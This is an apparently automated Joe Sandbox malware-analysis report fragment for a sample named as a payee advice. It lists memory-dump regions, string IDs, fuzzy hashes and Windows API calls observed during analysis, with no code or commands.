                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LR]q$LR]q
                                                                                                                                          • API String ID: 0-3917262905
                                                                                                                                          • Opcode ID: c79908d2cf2aaa17de540560952148263287d69614cf7237a78f628bc955649d
                                                                                                                                          • Instruction ID: 71acac825159e622ead996f676fb6e13cce00a313b4b1508f261c03e2db36516
                                                                                                                                          • Opcode Fuzzy Hash: c79908d2cf2aaa17de540560952148263287d69614cf7237a78f628bc955649d
                                                                                                                                          • Instruction Fuzzy Hash: 3581A234B14205AFD714DF78C865A5F7BB2BF89644B1541A9E44ADB3A1DB30EC02CF91
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ,aq$,aq
                                                                                                                                          • API String ID: 0-2990736959
                                                                                                                                          • Opcode ID: 6634b1f007d13b867d61e60a1c926245d46ca4e21a187f36d04632bd4d8da44d
                                                                                                                                          • Instruction ID: bd9437d586553bd72f297243a438f1ee1a91a8a45c971755d408c4b3155379ee
                                                                                                                                          • Opcode Fuzzy Hash: 6634b1f007d13b867d61e60a1c926245d46ca4e21a187f36d04632bd4d8da44d
                                                                                                                                          • Instruction Fuzzy Hash: 6281BE74A00505CFCB18CF69DC8496ABBF2BF89315B258169D406E7379DB31EC61CBA1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (o]q$(o]q
                                                                                                                                          • API String ID: 0-1858875562
                                                                                                                                          • Opcode ID: d9dc8d33779aa59a453641811444f85ebdc87ed2005c7edd4776a4a978deeb82
                                                                                                                                          • Instruction ID: 283a3329aa3dafe66bbd1a3e59ab237f070db7db6fe3953fa28ab2563586c0c4
                                                                                                                                          • Opcode Fuzzy Hash: d9dc8d33779aa59a453641811444f85ebdc87ed2005c7edd4776a4a978deeb82
                                                                                                                                          • Instruction Fuzzy Hash: 8E4126357082048FC7059B78DC64A6E7FB2AFC9711B1444AAF506CB7A2DB31CD55CB91
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Xaq$Xaq
                                                                                                                                          • API String ID: 0-1488805882
                                                                                                                                          • Opcode ID: 37f34f395261b580f2390af5b1309bcf21fd7a94955880ccd8e4ecb0d1b88669
                                                                                                                                          • Instruction ID: a718e24fcf3dba5e90680a8bc9173e0fa2e2f72a44bafe72716ff65b9ac2d51d
                                                                                                                                          • Opcode Fuzzy Hash: 37f34f395261b580f2390af5b1309bcf21fd7a94955880ccd8e4ecb0d1b88669
                                                                                                                                          • Instruction Fuzzy Hash: DA316731B042258BDF2C4AF98C9427EAAE6AFC5300F68443ED822D3390DF74CE5593A0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: 8bq$TJbq
• API String ID: 0-3440557903
• Opcode ID: 75740d48301154629239331aeb3ce3078353d91971545c7424842cebe2b5426c
• Instruction ID: dc858eecc686cd0172de9b0cdc99e1510bc44f5d94a2a16f398bcd65e9bfb55d
• Opcode Fuzzy Hash: 75740d48301154629239331aeb3ce3078353d91971545c7424842cebe2b5426c
• Instruction Fuzzy Hash: 53313575B002098FCB45DBA8C491E9DBBB2FF88324F295951E505EB362DB31EC85CB90
Strings
Memory Dump Source
• Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: 8bq$TJbq
• API String ID: 0-3440557903
• Opcode ID: dac6204bf213f666cc1eb4938dae9502e8f5db0259e76635266f377893361acc
• Instruction ID: d8f3bb5b47ccecfe606c9dd4a609f53fa751888d38680aab454a5d00a854c253
• Opcode Fuzzy Hash: dac6204bf213f666cc1eb4938dae9502e8f5db0259e76635266f377893361acc
• Instruction Fuzzy Hash: 83313675B001098FCB41EBA8C490E9DBBB2FF88324F255955E505AF362DB31EC85CB90
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q
• API String ID: 0-3120983240
• Opcode ID: e834f891d311cb8fd4c7de6376d00b7ef8356b97c5b637f94101ae2cebff0fff
• Instruction ID: d63fcf2c06579c95479db758b677452ec1ef9b8fb6d29a6e6308f1ccc3ddd8c7
• Opcode Fuzzy Hash: e834f891d311cb8fd4c7de6376d00b7ef8356b97c5b637f94101ae2cebff0fff
• Instruction Fuzzy Hash: 8FF044353002156FDB195AAADC5497ABADFEBC83A0B148429B949C7351DE71CD1183A1
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: LR]q
• API String ID: 0-3081347316
• Opcode ID: a5d5e19974fec895b5b96b3e75b9ead9dfd312172ead874996980988e990c68e
• Instruction ID: 5586c49009c7e1b81c04ba5e78e49c5c9554209be89e7f87bbf988e8bbc91c44
• Opcode Fuzzy Hash: a5d5e19974fec895b5b96b3e75b9ead9dfd312172ead874996980988e990c68e
• Instruction Fuzzy Hash: FD52C874A00619CFCB64DF74DD94A9DBBB2FB99301F2055A9E409A7760DB306E86CF80
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B0066C2
Memory Dump Source
• Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 32b4e7a19f9bdfea0b27618e6df7a34a07bf68830d4e90569312b486c7e37273
• Instruction ID: 38a8fd44c8136c904749cad5a85092ae81c86ca063beea777e9498ae4c34be4b
• Opcode Fuzzy Hash: 32b4e7a19f9bdfea0b27618e6df7a34a07bf68830d4e90569312b486c7e37273
• Instruction Fuzzy Hash: D451E3B1D00349DFDB14CF99C984ADEBFB2BF48310F64816AE819AB210DB759845CF90
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B0066C2
Memory Dump Source
• Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: fe2780d67538b81621ff1ceee69a50818476c14ced6d0840c1c992d5b49b3ad4
• Instruction ID: c9bcaad1599f637fbfb5cff8f656644f8b7132cac4e4d9e87895b0a368decc96
• Opcode Fuzzy Hash: fe2780d67538b81621ff1ceee69a50818476c14ced6d0840c1c992d5b49b3ad4
• Instruction Fuzzy Hash: 9241C1B1D00349DFDB14CF99C984ADEBFB6BF48310F64816AE819AB210DB75A845CF91
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 3B008DB1
Memory Dump Source
• Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: a178355fd02e8099da86d50b930d4b0ac5e27d5fe8e584f514327b5f1da9d4cf
• Instruction ID: 7c9bc5886d4ec2922484b65026a7987cfb0d84931e4bb300325f50ccb00665ae
• Opcode Fuzzy Hash: a178355fd02e8099da86d50b930d4b0ac5e27d5fe8e584f514327b5f1da9d4cf
• Instruction Fuzzy Hash: 694149B9900305DFDB14CF99C488A9ABBF5FF88310F24C59AE519A7321DB34A841CFA1
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A99B707
Memory Dump Source
• Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 9ece54a8e01e62cffcf0e8d888c50807c5d9c0966725940d4d0548f526f89922
• Instruction ID: aa06fd0f992f4859765fe148ee4cbad7f92883cb4e0dbeedd86777f348c5b170
• Opcode Fuzzy Hash: 9ece54a8e01e62cffcf0e8d888c50807c5d9c0966725940d4d0548f526f89922
• Instruction Fuzzy Hash: 3F2103B5D00249AFDB10CFAAD584AEEBFF5EB48310F24805AE858A3310D378A951CF61
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A99B707
Memory Dump Source
• Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 3c125c44792c77e2ef14277566812347c279413220cd13b71a481de6d3fe5cbd
• Instruction ID: f0443753bca62ac717b2b32d6fef5db9ff6c6977eed84fe42cb65cc5f443b7b5
• Opcode Fuzzy Hash: 3c125c44792c77e2ef14277566812347c279413220cd13b71a481de6d3fe5cbd
• Instruction Fuzzy Hash: 3321C4B5D00249AFDB10CFAAD584ADEBFF8EB48310F14841AE919A3310D378A954CFA5
APIs
• OleInitialize.OLE32(00000000), ref: 3B00B28D
Memory Dump Source
• Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 603d69ee75f0822b51a4f61a22544093e5ca8157bddd0cc1171d018654c60ba9
• Instruction ID: db3fbbb84d2346ee199259362d088d8e8c855f4846aaed22deb66ae16e8a1f45
• Opcode Fuzzy Hash: 603d69ee75f0822b51a4f61a22544093e5ca8157bddd0cc1171d018654c60ba9
• Instruction Fuzzy Hash: D31142B1D003488FDB20DF9AD549B9EBBF4EB48320F20845AE519A7300C778A941CFA6
APIs
• OleInitialize.OLE32(00000000), ref: 3B00B28D
Memory Dump Source
• Source File: 00000004.00000002.3354001075.000000003B000000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3b000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 35cc92d917b274b2a98098fa8660396c52642fcff0bd77ee6899fc0cd4053406
• Instruction ID: 9a5d46e7fd817f781f8a6ec7bfd4ff8f8ceea55702adae290cf6708baa24c72a
• Opcode Fuzzy Hash: 35cc92d917b274b2a98098fa8660396c52642fcff0bd77ee6899fc0cd4053406
• Instruction Fuzzy Hash: 691112B5C002498FDB20CFAAD585BDEBFF4AB48320F248459D459A3200C775A545CFA5
Strings
Memory Dump Source
• Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: PEY7
• API String ID: 0-1339874439
• Opcode ID: b9a78445b85f87d7e1b1f0286cc7fd569e39f3275fdc6199a5f96c0813d29a9d
• Instruction ID: 6a27a44574d9bbe0e0e6d12531da213587c53b63a7b780b128bdb8f8b8443b31
• Opcode Fuzzy Hash: b9a78445b85f87d7e1b1f0286cc7fd569e39f3275fdc6199a5f96c0813d29a9d
• Instruction Fuzzy Hash: FB819074E412689FDB65DF69CD51BDDBBB2AF89300F1080EAD848A7251EB315E81CF40
Strings
Memory Dump Source
• Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: Haq
• API String ID: 0-725504367
• Opcode ID: eb34582da841d21c19a7fad0eb24fb170860834ba69473ab90fa50f22401a209
• Instruction ID: 4ad68d3e72e9647f1d4970aec623a717578b0fc99a29f6b04285de9fd4d5bab0
• Opcode Fuzzy Hash: eb34582da841d21c19a7fad0eb24fb170860834ba69473ab90fa50f22401a209
• Instruction Fuzzy Hash: 3731B531B042489FCB45EFB8D9599AE7BF6AFC9341B1040BEE509D7291EA318E02C791
Strings
Memory Dump Source
• Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID: |nP7
• API String ID: 0-1088609865
• Opcode ID: c6970480f78e20be2ed11e823026fe9b9b295b4e55d8f5b9e4463c4da4d12c2b
• Instruction ID: 4cd0ce3785a08fb86c07cd391747c42356265dc4de1b377644adef80cb614217
• Opcode Fuzzy Hash: c6970480f78e20be2ed11e823026fe9b9b295b4e55d8f5b9e4463c4da4d12c2b
• Instruction Fuzzy Hash: A531753570825ABFDB15DB78EC8042FBBA2BF41244B0945A6E078CB651DB30DD42CF82
Strings
Memory Dump Source
• Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: t
                                                                                                                                          • API String ID: 0-2238339752
                                                                                                                                          • Opcode ID: d8c44f11a7d3ee95477d6312e9c13b29239670dd7394d0164b67f62212a17966
                                                                                                                                          • Instruction ID: ededeb20534bf2f4a14cceaad19d20f9a9f272bb192497cf4a634e4a8aeb4709
                                                                                                                                          • Opcode Fuzzy Hash: d8c44f11a7d3ee95477d6312e9c13b29239670dd7394d0164b67f62212a17966
                                                                                                                                          • Instruction Fuzzy Hash: 9E310274E056088FDB08DFBAD8406EDBBB2BF89300F14D12AD419BB295DB349946CF55
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Haq
                                                                                                                                          • API String ID: 0-725504367
                                                                                                                                          • Opcode ID: d98a179e4c14f1b6243f64ef22da73cfad75bb61bc1ab458508e525cc77c5ede
                                                                                                                                          • Instruction ID: 2a2c49759e83ed2a92f780f7bb083f976f16e1da0dede4e5aef591c69d1413a1
                                                                                                                                          • Opcode Fuzzy Hash: d98a179e4c14f1b6243f64ef22da73cfad75bb61bc1ab458508e525cc77c5ede
                                                                                                                                          • Instruction Fuzzy Hash: 86310231708285AFCB05AF78C8149AD7FB6FFCA340F1580AAD5428B6A2DB318E55CB50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: F
                                                                                                                                          • API String ID: 0-2730988801
                                                                                                                                          • Opcode ID: 17653c145a4f9731d49b2b1cffd2cbd6929586e7c64821f2f0a29dcba6cfe82c
                                                                                                                                          • Instruction ID: 34ea13f2fe8977cd47a1f4339f95791ffd494544388ae494efcbef91dfb3a155
                                                                                                                                          • Opcode Fuzzy Hash: 17653c145a4f9731d49b2b1cffd2cbd6929586e7c64821f2f0a29dcba6cfe82c
                                                                                                                                          • Instruction Fuzzy Hash: FA313874D052498FCB05DFB8D8046EDBFF4EF4A300F1551AAD444E7261EB341A95CBA2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 3"7
                                                                                                                                          • API String ID: 0-3328401908
                                                                                                                                          • Opcode ID: a96cc22a4b589ff503b87c49e496749733d0e75a97462d6f8d91ad58403000bb
                                                                                                                                          • Instruction ID: f516c3ba1df41ed75b723e2943a89118659ec5a7f3f788835076a4f3f92e4c2a
                                                                                                                                          • Opcode Fuzzy Hash: a96cc22a4b589ff503b87c49e496749733d0e75a97462d6f8d91ad58403000bb
                                                                                                                                          • Instruction Fuzzy Hash: AF11E9357055118FC7195B2ADCA493EBBA2FFC97513194079E40ADB765CF31DC028B90
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $EY7PEY7
                                                                                                                                          • API String ID: 0-1479923497
                                                                                                                                          • Opcode ID: 7310dc2b6533e3c4d16ab4ea03222a3155f0ec144fcfe9d1f7432a89ca4bdf48
                                                                                                                                          • Instruction ID: 36af1092cc33f4909f9d30f78a620e6422b60b814d325be1b0d4eca4ad20df98
                                                                                                                                          • Opcode Fuzzy Hash: 7310dc2b6533e3c4d16ab4ea03222a3155f0ec144fcfe9d1f7432a89ca4bdf48
                                                                                                                                          • Instruction Fuzzy Hash: A42162B0D042099FDB05EFA9C84069EBFF2FB81300F10C5AAD0589B261E7749A168F81
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $EY7PEY7
                                                                                                                                          • API String ID: 0-1479923497
                                                                                                                                          • Opcode ID: 6301c810f25eff626d7e18068a932338357a2e202eaab175f9f7fbd77dcbe615
                                                                                                                                          • Instruction ID: 53f61f2422d06ec0c23a79ad292a2357a1486c1c60d24d9b41a9542f604a5a89
                                                                                                                                          • Opcode Fuzzy Hash: 6301c810f25eff626d7e18068a932338357a2e202eaab175f9f7fbd77dcbe615
                                                                                                                                          • Instruction Fuzzy Hash: C4111FB0D0010EDFDB44EFE9D94069EBBF2FB85304F10D5A9E058AB261EB745A568F81
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ab1fa8de9d1d8f20196b62549490feea9debdfb09569bbe5627c7b20cf7d4762
                                                                                                                                          • Instruction ID: f2e5963f49b8b3bf034fd642b078c7e7adaa245d979f3307fdfe8dce8c86ca6e
                                                                                                                                          • Opcode Fuzzy Hash: ab1fa8de9d1d8f20196b62549490feea9debdfb09569bbe5627c7b20cf7d4762
                                                                                                                                          • Instruction Fuzzy Hash: 9412A834421653DFE2402B60EEAC12E7BA1FB5F727710AD24F10FC1865AB7546DACB62
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 11704e21ed1fb187432d1545e4f5dc98ed576fb60b99211a7a64203db73c7dc8
                                                                                                                                          • Instruction ID: a87587241915ec657285970e9359571a4abe3808d84acaad5f2c1457147ff6d2
                                                                                                                                          • Opcode Fuzzy Hash: 11704e21ed1fb187432d1545e4f5dc98ed576fb60b99211a7a64203db73c7dc8
                                                                                                                                          • Instruction Fuzzy Hash: AF9148315046458FCB11CF6CCC808AABFF9EF85321B15C6A6D858D7352D331E866CBA1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9ebd8bd400046bf48eb6e7d029db2425fae2f4eac5262023b4326557f65d258d
                                                                                                                                          • Instruction ID: 6708d920f0c971fdc8f59c43941d784bcc623b5b857df2ec62fc50cfaf8e7108
                                                                                                                                          • Opcode Fuzzy Hash: 9ebd8bd400046bf48eb6e7d029db2425fae2f4eac5262023b4326557f65d258d
                                                                                                                                          • Instruction Fuzzy Hash: 54713A347006058FCB15DF68CCA4A6E7BE6AF9A340B1941A9E806DB371DF70DC51CB51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fd632a60bcf0feba6777631506a953e22dd8f47bb0c31717bf19a4525bac8ff7
                                                                                                                                          • Instruction ID: 09031d19136fc3bb6e74723068f26688cd94acd5fdf9038ddb274cb2302c9492
                                                                                                                                          • Opcode Fuzzy Hash: fd632a60bcf0feba6777631506a953e22dd8f47bb0c31717bf19a4525bac8ff7
                                                                                                                                          • Instruction Fuzzy Hash: 955114767046029FD7048A68DC59AABBBA9FBC9324B11852FE41AC7751E732E801CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8c1b6bcb14a575a7ba63a9cba0b619bc85100e72a3cdb34d8abd977a4d8daf7a
                                                                                                                                          • Instruction ID: d327c6ad2587ae7c0be9c7768b611e94e93b37e3821b7f1784e5361074c4c004
                                                                                                                                          • Opcode Fuzzy Hash: 8c1b6bcb14a575a7ba63a9cba0b619bc85100e72a3cdb34d8abd977a4d8daf7a
                                                                                                                                          • Instruction Fuzzy Hash: B671C074E01218DFDB14DFA5C990ADDBBB2BF89304F20912AD419BB355DB35A942CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 10db189e000dbf8717a2308e3c8c5c7f8ca5f35cf350583a07905f3930278ef3
                                                                                                                                          • Instruction ID: 6c328659348525f6065772400b6560bcbbcfae1a4dd9543041f42308774ff39e
                                                                                                                                          • Opcode Fuzzy Hash: 10db189e000dbf8717a2308e3c8c5c7f8ca5f35cf350583a07905f3930278ef3
                                                                                                                                          • Instruction Fuzzy Hash: 3171DF74E00218DFDB14DFA9C990ADDBBB2BF89300F24912AD419BB354DB359982CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          • Instruction Fuzzy Hash: 4A310570E052488FDB08DFAAD9506DEBBF3AF89300F64D02AC458BB264EB355946CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4c6e75719161187e12700581ba28c5028ddf0d2ce5a271764add9ee0633f0fff
                                                                                                                                          • Instruction ID: 09964b12b752d588a4e4db97aa706757cc23c3aeca09a97cae3f920fb0b8422c
                                                                                                                                          • Opcode Fuzzy Hash: 4c6e75719161187e12700581ba28c5028ddf0d2ce5a271764add9ee0633f0fff
                                                                                                                                          • Instruction Fuzzy Hash: 63311575E052088FEB04DFAAD9806DEBBF3AF89300F64D42AC418BB254DB395902CF55
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 14354849d0ef71ca569aa3efc212ba10b73d2ceb3f1c3770138f0ece93f567f8
